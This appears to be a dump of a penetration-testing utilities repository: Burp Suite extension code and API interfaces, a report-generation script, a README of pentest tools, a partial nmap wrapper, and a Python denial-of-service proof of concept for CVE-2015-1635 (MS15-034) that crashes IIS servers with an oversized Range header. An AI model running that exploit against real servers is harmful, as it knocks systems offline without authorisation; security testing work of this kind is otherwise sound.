method is used to retrieve the HTTP service for this request / 85 | * response. 86 | * 87 | * @return An 88 | * IHttpService object containing details of the HTTP service. 89 | */ 90 | IHttpService getHttpService(); 91 | 92 | /** 93 | * This method is used to update the HTTP service for this request / 94 | * response. 95 | * 96 | * @param httpService An 97 | * IHttpService object containing details of the new HTTP 98 | * service. 99 | */ 100 | void setHttpService(IHttpService httpService); 101 | 102 | } 103 | -------------------------------------------------------------------------------- /ms15-034/CVE-2015-1635.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | 4 | """cve-2015-1635.py: DoS PoC""" 5 | 6 | 7 | import argparse, BeautifulSoup, re, requests, socket, sys, urlparse 8 | 9 | 10 | __author__ = 't0n1' 11 | __credits__ = 'sha0' 12 | 13 | 14 | LOW = '2' 15 | HIGH = '18446744073709551615' 16 | UA = 'Mozilla/5.0' 17 | TOUT = 3 18 | MAX = 262144 19 | 20 | 21 | s = requests.Session() 22 | 23 | 24 | def parse_url(url): 25 | url = urlparse.urljoin(URL, url) 26 | parsed = urlparse.urlparse(url) 27 | return parsed.scheme + '://' + parsed.netloc + parsed.path 28 | 29 | 30 | def get_content_length(url): 31 | h = { 32 | 'User-agent': UA, 33 | } 34 | r = s.head(url, headers = h, verify = False) 35 | return int(r.headers['content-length']) 36 | 37 | 38 | def get_resource(html): 39 | parsed = urlparse.urlparse(URL) 40 | urllist = [] 41 | soup = BeautifulSoup.BeautifulSoup(html) 42 | for img in soup.findAll('img', src = True): 43 | urllist.append(parse_url(img['src'])) 44 | for link in soup.findAll('a', href = True): 45 | urllist.append(parse_url(link['href'])) 46 | for url in urllist: 47 | if parsed.netloc not in url: 48 | continue 49 | cl = get_content_length(url) 50 | if 0 < cl and cl <= MAX: 51 | print '[+] New URL = ' + url + ' | Content-Length = ' + str(cl) + ' <= ' + str(MAX) 52 | return url 53 | cl = get_content_length(URL) 54 | print '[+] Same URL = ' + URL + ' | Content-Length = ' + str(cl) + ' <= ' + str(MAX) 55 | return URL 56 | 57 | 58 | def check_iis(): 59 | global URL 60 | h = { 61 | 'User-agent': UA, 62 | } 63 | r = s.get(URL, headers = h, verify = False) 64 | print '[+] URL = ' + URL 65 | if 'server' in r.headers.keys(): 66 | server = r.headers['server'] 67 | if 'iis' in server.lower(): 68 | print '[+] Server HTTP Header = ' + server 69 | if r.status_code == 200: 70 | print '[+] Status Code = 200' 71 | URL = get_resource(r.text) 72 | return True 73 | else: 74 | print '[-] Status Code = ' + str(r.status_code) 75 | return False 76 | else: 77 | print '[-] Server HTTP Header = ' + server 78 | return False 79 | else: 80 | print '[-] Not Server HTTP Header' 81 | return False 82 | 83 | 84 | def check_vulnerable(): 85 | h = { 86 | 'User-agent': UA, 87 | 'Range': 'bytes=0-' + HIGH 88 | } 89 | r = s.get(URL, headers = h, verify = False) 90 | if r.status_code == 416: 91 | print '[+] >>>>>>>>>> Vulnerable | Status Code = 416' 92 | return True 93 | elif r.status_code == 400: 94 | print '[-] Not vulnerable | Status Code = 400 | Patched?' 95 | return False 96 | else: 97 | print '[-] Not vulnerable | Status Code = ' + str(r.status_code) 98 | return False 99 | 100 | 101 | def exploit(): 102 | h = { 103 | 'User-agent': UA, 104 | 'Range': 'bytes=' + LOW + '-' + HIGH 105 | } 106 | try: 107 | r = s.get(URL, headers = h, timeout = TOUT, verify = False) 108 | if r.status_code == 206: 109 | print '[-] Not vulnerable | Status Code = 206 | Kernel cache disabled?' 110 | except requests.exceptions.ConnectionError: 111 | pass 112 | except requests.exceptions.Timeout: 113 | print '[+] Blue Screen of Death! Game Over!' 114 | 115 | 116 | parser = argparse.ArgumentParser() 117 | parser.add_argument('-u', dest = 'url', help = 'Target', required = True) 118 | parser.add_argument('-e', dest = 'exploit', action = 'store_true', help = 'Exploit', required = False) 119 | 120 | 121 | args = parser.parse_args() 122 | URL = args.url 123 | 124 | 125 | if check_iis(): 126 | if check_vulnerable(): 127 | if args.exploit == True: 128 | exploit() 129 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pentest utils 2 | 3 | ## Misc 4 | 5 | [swfdecrypt_w32_unix.cpp](./swfdecrypt_w32_unix.cpp) Win32 + Linux port of swfdecrypt 6 | 7 | ## Burp suite extensions & helpers 8 | 9 | [burpsuite/burp.sh](./burpsuite/burp.sh) Init script with custom Java memory parameters, etc. 10 | 11 | [burpsuite/mkBurpExtension.sh](./burpsuite/mkBurpExtension.sh) Extensions creator helper 12 | 13 | [burpsuite/extensions/HTTPInjector.py](./burpsuite/extensions/HTTPInjector.py) Extension to inject JavaScript by @Agarry_FR 14 | 15 | [burpsuite/extensions/RandomUUID.py](./burpsuite/extensions/RandomUUID.py) Standard Life RandomUUID injector for web app test 16 | 17 | [burpsuite/extensions/SQLiPy.py](./burpsuite/extensions/SQLiPy.py) Fixed SQLMap extension (the bappstore does not work) 18 | 19 | [burpsuite/extensions/base64/](./burpsuite/extensions/base64/) Java Base64 enc/dec extension 20 | 21 | [burpsuite/burp_issue2appendix.py](./burpsuite/burp_issue2appendix.py) Reads an Burp Suite issues XML file and print all the issues, payloads and details 22 | 23 | [burpsuite/burp_item2appendix.py](./burpsuite/burp_item2appendix.py) Reads an Burp Suite issues XML file and print all the issues, payloads and details 24 | 25 | [burpsuite/burp_item2web.py](./burpsuite/burp_item2web.py): Reads an Burp Suite issues XML file and creates the web hierarchy of the scoped web site (imagine that you could dump the contents spidered by Burp's spider to the filesystem) [Note: Incompleted] 26 | 27 | [burpsuite/burp_item.xml](burpsuite/burp_item.xml): test XML file 28 | 29 | ## Nmap NSE scripts 30 | 31 | [nmap/http-ms15-034.nse](./nmap/http-ms15-034.nse) MS15-034 Nmap NSE scrip 32 | 33 | ## Android 34 | 35 | [drozer/object_input_stream.py](./drozer/object_input_stream.py) CVE-2014-7911 java.io.ObjectInputStream Android<5.0 36 | 37 | [drozer/secure_random.py](./drozer/secure_random.py) java.secure.SecureRandom (patched module) 38 | 39 | [android/dump_preferences.sh](./android/dump_preferences.sh): Dump Android application preferences (/data/data/appname) 40 | 41 | [android/dump_sqlite.sh](./android/dump_sqlite.sh): Explore the filesystem for sqlite 42 | 43 | [android/logcat.sh](./android/logcat.sh): Android LogCat Wrapper 44 | 45 | [android/mystrace.sh](./android/mytrace.sh): Android strace wrapper 46 | 47 | [android/screenshot.sh](./android/screenshot.sh): Takes a screenshot of a device's screen 48 | 49 | [android/install_strace.sh](./android/install_strace.sh): Installs strace on an Android device 50 | 51 | ## iOS 52 | 53 | [ios/install-iRET-deps.sh](./ios/install-iRET-deps.sh): Installs iRET on an iOS device 54 | 55 | [ios/install_pentest_iOS_env.sh](./ios/install_pentest_iOS_env.sh): Installs all pentest toolz on an iOS device 56 | 57 | [ios/iOSaudit.sh](./ios/): Performs a quick security audit of an iOS app 58 | 59 | Execution example: 60 | 61 | ``` 62 | iPhone:~ root# ./iOSaudit.sh Test.ipa 63 | 64 | [*]====================================================== 65 | [*] >> iOS app quick audit 66 | [*] >> devnull@libcrack.so 67 | [*]====================================================== 68 | [*] 69 | [*] Unpacking Test.ipa 70 | [*] Searching ipa binary... 71 | [*] Checking binary Payload/Test.app/Test 72 | [*] Detected architectures: 73 | [*] > armv7 74 | [*] > armv7s 75 | [*] 76 | [*] Discovering _check_ procedures 77 | [*] > Executing _check_stack 78 | [*] [SUCCESS] Stack guard found: __stack_chk_guard 79 | [*] > Executing _check_pie 80 | [*] [SUCCESS] PIE is enabled 81 | [*] > Executing _check_arc 82 | [*] [SUCCESS] ARC found: _objc_retain 83 | [*] > Executing _check_badcalls 84 | [*] [FAIL] found function call _malloc 85 | [*] 86 | [*] Done 87 | ``` 88 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IParameter.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IParameter.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details about an HTTP request parameter. 14 | */ 15 | public interface IParameter 16 | { 17 | /** 18 | * Used to indicate a parameter within the URL query string. 19 | */ 20 | static final byte PARAM_URL = 0; 21 | /** 22 | * Used to indicate a parameter within the message body. 23 | */ 24 | static final byte PARAM_BODY = 1; 25 | /** 26 | * Used to indicate an HTTP cookie. 27 | */ 28 | static final byte PARAM_COOKIE = 2; 29 | /** 30 | * Used to indicate an item of data within an XML structure. 31 | */ 32 | static final byte PARAM_XML = 3; 33 | /** 34 | * Used to indicate the value of a tag attribute within an XML structure. 35 | */ 36 | static final byte PARAM_XML_ATTR = 4; 37 | /** 38 | * Used to indicate the value of a parameter attribute within a multi-part 39 | * message body (such as the name of an uploaded file). 40 | */ 41 | static final byte PARAM_MULTIPART_ATTR = 5; 42 | /** 43 | * Used to indicate an item of data within a JSON structure. 44 | */ 45 | static final byte PARAM_JSON = 6; 46 | 47 | /** 48 | * This method is used to retrieve the parameter type. 49 | * 50 | * @return The parameter type. The available types are defined within this 51 | * interface. 52 | */ 53 | byte getType(); 54 | 55 | /** 56 | * This method is used to retrieve the parameter name. 57 | * 58 | * @return The parameter name. 59 | */ 60 | String getName(); 61 | 62 | /** 63 | * This method is used to retrieve the parameter value. 64 | * 65 | * @return The parameter value. 66 | */ 67 | String getValue(); 68 | 69 | /** 70 | * This method is used to retrieve the start offset of the parameter name 71 | * within the HTTP request. 72 | * 73 | * @return The start offset of the parameter name within the HTTP request, 74 | * or -1 if the parameter is not associated with a specific request. 75 | */ 76 | int getNameStart(); 77 | 78 | /** 79 | * This method is used to retrieve the end offset of the parameter name 80 | * within the HTTP request. 81 | * 82 | * @return The end offset of the parameter name within the HTTP request, or 83 | * -1 if the parameter is not associated with a specific request. 84 | */ 85 | int getNameEnd(); 86 | 87 | /** 88 | * This method is used to retrieve the start offset of the parameter value 89 | * within the HTTP request. 90 | * 91 | * @return The start offset of the parameter value within the HTTP request, 92 | * or -1 if the parameter is not associated with a specific request. 93 | */ 94 | int getValueStart(); 95 | 96 | /** 97 | * This method is used to retrieve the end offset of the parameter value 98 | * within the HTTP request. 99 | * 100 | * @return The end offset of the parameter value within the HTTP request, or 101 | * -1 if the parameter is not associated with a specific request. 102 | */ 103 | int getValueEnd(); 104 | } 105 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/BurpExtender.java: -------------------------------------------------------------------------------- 1 | // Encode/Decode HTTP requests/responses 2 | // devnull@libcrack.so 3 | // sab jul 26 03:15:11 CEST 2014 4 | 5 | package burp; 6 | 7 | import java.net.URL; 8 | import java.util.List; 9 | import java.util.LinkedList; 10 | 11 | public class BurpExtender implements IBurpExtender, IHttpListener { 12 | 13 | private IBurpExtenderCallbacks callbacks; 14 | private IExtensionHelpers helpers; 15 | private IHttpRequestResponse currentlyDisplayedItem; 16 | 17 | public static String EXTENSION_NAME = "Base64 auto encode/decode"; 18 | 19 | // ===== Implements IBurpExtender ================================================= 20 | @Override 21 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { 22 | this.callbacks = callbacks; 23 | helpers = callbacks.getHelpers(); 24 | callbacks.issueAlert(String.format("Loading extension " + EXTENSION_NAME)); 25 | callbacks.setExtensionName(EXTENSION_NAME); 26 | callbacks.registerHttpListener(BurpExtender.this); 27 | } 28 | 29 | // ===== Implements IHttpListener ================================================= 30 | @Override 31 | public void processHttpMessage( 32 | int toolFlag, 33 | boolean messageIsRequest, 34 | IHttpRequestResponse messageInfo) { 35 | 36 | // ----- Request processing --------------------------------------------------- 37 | 38 | if (messageIsRequest) { 39 | 40 | // Methods of IBurpExtenderCallbacks must be wrapped inside 41 | // try catch block as they throws java.lang.Exception 42 | try { 43 | 44 | IRequestInfo requestInfo = helpers.analyzeRequest(messageInfo); 45 | URL url = requestInfo.getUrl(); 46 | 47 | if(callbacks.isInScope(url)) { 48 | callbacks.issueAlert("Base64 encoding full request"); 49 | List headers = requestInfo.getHeaders(); 50 | String request = new String(messageInfo.getRequest()); 51 | String requestBody = request.substring(requestInfo.getBodyOffset()); 52 | // Construct new HTTP request 53 | String newRequestBody = helpers.base64Encode("'" + requestBody + "'"); 54 | byte[] newRequest = helpers.buildHttpMessage(headers, newRequestBody.getBytes()); 55 | messageInfo.setRequest(newRequest); 56 | } 57 | 58 | } catch(Exception e) { 59 | e.printStackTrace(); 60 | } 61 | 62 | } else { 63 | 64 | // ----- Response processing ------------------------------------------------- 65 | 66 | try { 67 | 68 | callbacks.issueAlert("Base64 decoding full response"); 69 | IResponseInfo responseInfo = helpers.analyzeResponse(messageInfo.getResponse()); 70 | List headers = responseInfo.getHeaders(); 71 | String response = new String(messageInfo.getResponse()); 72 | String responseBody = response.substring(responseInfo.getBodyOffset()); 73 | // Construct new HTTP response 74 | byte[] newResponseBody = helpers.base64Decode(responseBody); 75 | byte[] newResponse = helpers.buildHttpMessage(headers, newResponseBody); 76 | messageInfo.setResponse(newResponse); 77 | 78 | } catch(Exception e) { 79 | e.printStackTrace(); 80 | } 81 | 82 | } 83 | 84 | } 85 | 86 | } 87 | -------------------------------------------------------------------------------- /burpsuite/burp_issue2appendix.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # jue ago 28 19:27:37 CEST 2014 3 | # devnull@libcrack.so 4 | # 5 | # Reads an Burp Suite issues XML file and 6 | # print all the issues, payloads and, details 7 | # based on previous work by Pablo Catalina 8 | # 9 | 10 | import sys 11 | import re 12 | from base64 import b64decode 13 | from xml.dom import minidom 14 | import html2text 15 | 16 | if len(sys.argv) != 2: 17 | print ("\n\tUsage: %s \n" % sys.argv[0]) 18 | sys.exit(1) 19 | 20 | filename = sys.argv[1] 21 | xmldoc = minidom.parse(filename) 22 | idict={} 23 | 24 | try: 25 | issueslist = xmldoc.getElementsByTagName('issue') 26 | except Exception as e: 27 | raise Exception("%s does not contain issues :-(") 28 | 29 | for issue in issueslist: 30 | 31 | issue_type_sqli = "1049088" 32 | issue_type_xss_stored = "2097408" 33 | issue_type_xss_reflected = "2097920" 34 | 35 | issue_type = issue.getElementsByTagName('type')[0].firstChild.data 36 | location = issue.getElementsByTagName('location')[0].firstChild.data 37 | url = location.split(' ')[0] 38 | param1 = re.search(r"\[(.*)\]", location).groups()[0] 39 | param = param1.replace('parameter','') 40 | request = b64decode(issue.getElementsByTagName('request')[0].firstChild.data) 41 | response = b64decode(issue.getElementsByTagName('response')[0].firstChild.data) 42 | detail = issue.getElementsByTagName('issueDetail')[0].firstChild.data 43 | 44 | detail1 = detail.replace('

','') 45 | detail2 = detail1.replace('','') 46 | detail3 = detail2.replace('','') 47 | 48 | payload = '' 49 | 50 | if issue_type == issue_type_sqli: 51 | detail4 = detail3.replace("You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.",'') 52 | detail = detail4 53 | elif issue_type == issue_type_xss_stored or issue_type == issue_type_xss_reflected: 54 | payload = re.search(r"he payload (.*) was submitted", detail3).groups()[0] 55 | detail = detail3 56 | else: 57 | print ("issue_type %s not found" % issue_type) 58 | 59 | if url not in idict.keys(): 60 | idict[url]={} 61 | if param not in idict[url]: 62 | idict[url][param]=(request,response,detail,payload) 63 | else: 64 | print ("[ERROR] URL: %s dupe PARAM: %s" % (url,param)) 65 | raise Exception("","") 66 | 67 | number = 0 68 | for url in sorted(idict.keys()): 69 | for param in sorted(idict[url].keys()): 70 | print ("=============================================================================================") 71 | print (" Instance number %s" % number) 72 | print (" URL: %s" % url) 73 | print (" Parameter: %s" % param) 74 | if issue_type == issue_type_xss_stored or issue_type == issue_type_xss_reflected: 75 | print (" Payload: %s" % idict[url][param][3]) 76 | print ("=============================================================================================") 77 | print ("\n[*] HTTP Request to %s :\n" % url) 78 | #print "" 79 | print ("-----------------------------------[ SNIP STARTS ]-----------------------------------") 80 | print ("%s" % idict[url][param][0],) 81 | print ("------------------------------------[ SNIP ENDS ]------------------------------------") 82 | #print "" 83 | print ("\n[*] HTTP Response to %s :\n" % url) 84 | #print "" 85 | print ("-----------------------------------[ SNIP STARTS ]-----------------------------------") 86 | print ("%s" % idict[url][param][1],) 87 | print ("------------------------------------[ SNIP ENDS ]------------------------------------") 88 | #print "" 89 | print ("\n[*] Issue detail :\n") 90 | print ("%s\n\n" % idict[url][param][2]) 91 | number = number + 1 92 | 93 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IInterceptedProxyMessage.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IInterceptedProxyMessage.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to represent an HTTP message that has been intercepted 14 | * by Burp Proxy. Extensions can register an 15 | * IProxyListener to receive details of proxy messages using this 16 | * interface. * 17 | */ 18 | public interface IInterceptedProxyMessage 19 | { 20 | /** 21 | * This action causes Burp Proxy to follow the current interception rules to 22 | * determine the appropriate action to take for the message. 23 | */ 24 | static final int ACTION_FOLLOW_RULES = 0; 25 | /** 26 | * This action causes Burp Proxy to present the message to the user for 27 | * manual review or modification. 28 | */ 29 | static final int ACTION_DO_INTERCEPT = 1; 30 | /** 31 | * This action causes Burp Proxy to forward the message to the remote server 32 | * or client, without presenting it to the user. 33 | */ 34 | static final int ACTION_DONT_INTERCEPT = 2; 35 | /** 36 | * This action causes Burp Proxy to drop the message. 37 | */ 38 | static final int ACTION_DROP = 3; 39 | /** 40 | * This action causes Burp Proxy to follow the current interception rules to 41 | * determine the appropriate action to take for the message, and then make a 42 | * second call to processProxyMessage. 43 | */ 44 | static final int ACTION_FOLLOW_RULES_AND_REHOOK = 0x10; 45 | /** 46 | * This action causes Burp Proxy to present the message to the user for 47 | * manual review or modification, and then make a second call to 48 | * processProxyMessage. 49 | */ 50 | static final int ACTION_DO_INTERCEPT_AND_REHOOK = 0x11; 51 | /** 52 | * This action causes Burp Proxy to skip user interception, and then make a 53 | * second call to processProxyMessage. 54 | */ 55 | static final int ACTION_DONT_INTERCEPT_AND_REHOOK = 0x12; 56 | 57 | /** 58 | * This method retrieves a unique reference number for this 59 | * request/response. 60 | * 61 | * @return An identifier that is unique to a single request/response pair. 62 | * Extensions can use this to correlate details of requests and responses 63 | * and perform processing on the response message accordingly. 64 | */ 65 | int getMessageReference(); 66 | 67 | /** 68 | * This method retrieves details of the intercepted message. 69 | * 70 | * @return An 71 | * IHttpRequestResponse object containing details of the 72 | * intercepted message. 73 | */ 74 | IHttpRequestResponse getMessageInfo(); 75 | 76 | /** 77 | * This method retrieves the currently defined interception action. The 78 | * default action is 79 | * ACTION_FOLLOW_RULES. If multiple proxy listeners are 80 | * registered, then other listeners may already have modified the 81 | * interception action before it reaches the current listener. This method 82 | * can be used to determine whether this has occurred. 83 | * 84 | * @return The currently defined interception action. Possible values are 85 | * defined within this interface. 86 | */ 87 | int getInterceptAction(); 88 | 89 | /** 90 | * This method is used to update the interception action. 91 | * 92 | * @param interceptAction The new interception action. Possible values are 93 | * defined within this interface. 94 | */ 95 | void setInterceptAction(int interceptAction); 96 | } 97 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IMessageEditorTab.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorTab.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * Extensions that register an 16 | * IMessageEditorTabFactory must return instances of this 17 | * interface, which Burp will use to create custom tabs within its HTTP message 18 | * editors. 19 | */ 20 | public interface IMessageEditorTab 21 | { 22 | /** 23 | * This method returns the caption that should appear on the custom tab when 24 | * it is displayed. Note: Burp invokes this method once when the tab 25 | * is first generated, and the same caption will be used every time the tab 26 | * is displayed. 27 | * 28 | * @return The caption that should appear on the custom tab when it is 29 | * displayed. 30 | */ 31 | String getTabCaption(); 32 | 33 | /** 34 | * This method returns the component that should be used as the contents of 35 | * the custom tab when it is displayed. Note: Burp invokes this 36 | * method once when the tab is first generated, and the same component will 37 | * be used every time the tab is displayed. 38 | * 39 | * @return The component that should be used as the contents of the custom 40 | * tab when it is displayed. 41 | */ 42 | Component getUiComponent(); 43 | 44 | /** 45 | * The hosting editor will invoke this method before it displays a new HTTP 46 | * message, so that the custom tab can indicate whether it should be enabled 47 | * for that message. 48 | * 49 | * @param content The message that is about to be displayed. 50 | * @param isRequest Indicates whether the message is a request or a 51 | * response. 52 | * @return The method should return 53 | * true if the custom tab is able to handle the specified 54 | * message, and so will be displayed within the editor. Otherwise, the tab 55 | * will be hidden while this message is displayed. 56 | */ 57 | boolean isEnabled(byte[] content, boolean isRequest); 58 | 59 | /** 60 | * The hosting editor will invoke this method to display a new message or to 61 | * clear the existing message. This method will only be called with a new 62 | * message if the tab has already returned 63 | * true to a call to 64 | * isEnabled() with the same message details. 65 | * 66 | * @param content The message that is to be displayed, or 67 | * null if the tab should clear its contents and disable any 68 | * editable controls. 69 | * @param isRequest Indicates whether the message is a request or a 70 | * response. 71 | */ 72 | void setMessage(byte[] content, boolean isRequest); 73 | 74 | /** 75 | * This method returns the currently displayed message. 76 | * 77 | * @return The currently displayed message. 78 | */ 79 | byte[] getMessage(); 80 | 81 | /** 82 | * This method is used to determine whether the currently displayed message 83 | * has been modified by the user. The hosting editor will always call 84 | * getMessage() before calling this method, so any pending 85 | * edits should be completed within 86 | * getMessage(). 87 | * 88 | * @return The method should return 89 | * true if the user has modified the current message since it 90 | * was first displayed. 91 | */ 92 | boolean isModified(); 93 | 94 | /** 95 | * This method is used to retrieve the data that is currently selected by 96 | * the user. 97 | * 98 | * @return The data that is currently selected by the user. This may be 99 | * null if no selection is currently made. 100 | */ 101 | byte[] getSelectedData(); 102 | } 103 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IScanIssue.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScanIssue.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve details of Scanner issues. Extensions can 14 | * obtain details of issues by registering an 15 | * IScannerListener or by calling 16 | * IBurpExtenderCallbacks.getScanIssues(). Extensions can also add 17 | * custom Scanner issues by registering an 18 | * IScannerCheck or calling 19 | * IBurpExtenderCallbacks.addScanIssue(), and providing their own 20 | * implementations of this interface 21 | */ 22 | public interface IScanIssue 23 | { 24 | /** 25 | * This method returns the URL for which the issue was generated. 26 | * 27 | * @return The URL for which the issue was generated. 28 | */ 29 | java.net.URL getUrl(); 30 | 31 | /** 32 | * This method returns the name of the issue type. 33 | * 34 | * @return The name of the issue type (e.g. "SQL injection"). 35 | */ 36 | String getIssueName(); 37 | 38 | /** 39 | * This method returns a numeric identifier of the issue type. See the Burp 40 | * Scanner help documentation for a listing of all the issue types. 41 | * 42 | * @return A numeric identifier of the issue type. 43 | */ 44 | int getIssueType(); 45 | 46 | /** 47 | * This method returns the issue severity level. 48 | * 49 | * @return The issue severity level. Expected values are "High", "Medium", 50 | * "Low", "Information" or "False positive". 51 | * 52 | */ 53 | String getSeverity(); 54 | 55 | /** 56 | * This method returns the issue confidence level. 57 | * 58 | * @return The issue confidence level. Expected values are "Certain", "Firm" 59 | * or "Tentative". 60 | */ 61 | String getConfidence(); 62 | 63 | /** 64 | * This method returns a background description for this type of issue. 65 | * 66 | * @return A background description for this type of issue, or 67 | * null if none applies. 68 | */ 69 | String getIssueBackground(); 70 | 71 | /** 72 | * This method returns a background description of the remediation for this 73 | * type of issue. 74 | * 75 | * @return A background description of the remediation for this type of 76 | * issue, or 77 | * null if none applies. 78 | */ 79 | String getRemediationBackground(); 80 | 81 | /** 82 | * This method returns detailed information about this specific instance of 83 | * the issue. 84 | * 85 | * @return Detailed information about this specific instance of the issue, 86 | * or 87 | * null if none applies. 88 | */ 89 | String getIssueDetail(); 90 | 91 | /** 92 | * This method returns detailed information about the remediation for this 93 | * specific instance of the issue. 94 | * 95 | * @return Detailed information about the remediation for this specific 96 | * instance of the issue, or 97 | * null if none applies. 98 | */ 99 | String getRemediationDetail(); 100 | 101 | /** 102 | * This method returns the HTTP messages on the basis of which the issue was 103 | * generated. 104 | * 105 | * @return The HTTP messages on the basis of which the issue was generated. 106 | * Note: The items in this array should be instances of 107 | * IHttpRequestResponseWithMarkers if applicable, so that 108 | * details of the relevant portions of the request and response messages are 109 | * available. 110 | */ 111 | IHttpRequestResponse[] getHttpMessages(); 112 | 113 | /** 114 | * This method returns the HTTP service for which the issue was generated. 115 | * 116 | * @return The HTTP service for which the issue was generated. 117 | */ 118 | IHttpService getHttpService(); 119 | 120 | } 121 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IScannerCheck.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerCheck.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * Extensions can implement this interface and then call 16 | * IBurpExtenderCallbacks.registerScannerCheck() to register a 17 | * custom Scanner check. When performing scanning, Burp will ask the check to 18 | * perform active or passive scanning on the base request, and report any 19 | * Scanner issues that are identified. 20 | */ 21 | public interface IScannerCheck 22 | { 23 | /** 24 | * The Scanner invokes this method for each base request / response that is 25 | * passively scanned. Note: Extensions should not only analyze the 26 | * HTTP messages provided during passive scanning, and should not make any 27 | * new HTTP requests of their own. 28 | * 29 | * @param baseRequestResponse The base HTTP request / response that should 30 | * be passively scanned. 31 | * @return A list of 32 | * IScanIssue objects, or 33 | * null if no issues are identified. 34 | */ 35 | List doPassiveScan(IHttpRequestResponse baseRequestResponse); 36 | 37 | /** 38 | * The Scanner invokes this method for each insertion point that is actively 39 | * scanned. Extensions may issue HTTP requests as required to carry out 40 | * active scanning, and should use the 41 | * IScannerInsertionPoint object provided to build scan 42 | * requests for particular payloads. Note: Extensions are responsible 43 | * for ensuring that attack payloads are suitably encoded within requests 44 | * (for example, by URL-encoding relevant metacharacters in the URL query 45 | * string). Encoding is not automatically carried out by the 46 | * IScannerInsertionPoint, because this would prevent Scanner 47 | * checks from testing for certain input filter bypasses. Extensions should 48 | * query the 49 | * IScannerInsertionPoint to determine its type, and apply any 50 | * encoding that may be appropriate. 51 | * 52 | * @param baseRequestResponse The base HTTP request / response that should 53 | * be actively scanned. 54 | * @param insertionPoint An 55 | * IScannerInsertionPoint object that can be queried to obtain 56 | * details of the insertion point being tested, and can be used to build 57 | * scan requests for particular payloads. 58 | * @return A list of 59 | * IScanIssue objects, or 60 | * null if no issues are identified. 61 | */ 62 | List doActiveScan( 63 | IHttpRequestResponse baseRequestResponse, 64 | IScannerInsertionPoint insertionPoint); 65 | 66 | /** 67 | * The Scanner invokes this method when the custom Scanner check has 68 | * reported multiple issues for the same URL path. This can arise either 69 | * because there are multiple distinct vulnerabilities, or because the same 70 | * (or a similar) request has been scanned more than once. The custom check 71 | * should determine whether the issues are duplicates. In most cases, where 72 | * a check uses distinct issue names or descriptions for distinct issues, 73 | * the consolidation process will simply be a matter of comparing these 74 | * features for the two issues. 75 | * 76 | * @param existingIssue An issue that was previously reported by this 77 | * Scanner check. 78 | * @param newIssue An issue at the same URL path that has been newly 79 | * reported by this Scanner check. 80 | * @return An indication of which issue(s) should be reported in the main 81 | * Scanner results. The method should return 82 | * -1 to report the existing issue only, 83 | * 0 to report both issues, and 84 | * 1 to report the new issue only. 85 | */ 86 | int consolidateDuplicateIssues( 87 | IScanIssue existingIssue, 88 | IScanIssue newIssue); 89 | } 90 | -------------------------------------------------------------------------------- /nmap/nmap.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # root@libcrack.so 3 | 4 | [[ ! -f "$1" ]] && { 5 | echo -e "\n\tUsage: $0 \n" 6 | exit 1 7 | } 8 | 9 | trap captura INT 10 | function captura () { printf "\e[1;31m Exiting\e[0m\n"; exit 1; } 11 | 12 | sudo=`which sudo` 13 | nmap=`which nmap` 14 | screen=`which screen` 15 | iplist="$1" 16 | 17 | declare -A tools 18 | 19 | # On a LAN, 100 milliseconds (--max-rtt-timeout 100ms) is a reasonable aggressive value. 20 | # Generally, not set the maximum RTT below 100 ms, nor exceed 1000 ms. 21 | # 22 | # --initial-rtt-timeout => double of the maximum round trip time out of ten packets 23 | # --max-rtt-timeout => triple or quadruple f the maximum round trip time out of ten packets 24 | # --min-rtt-timeout => rarely used,could be useful when a network very unreliable 25 | # --host-timeout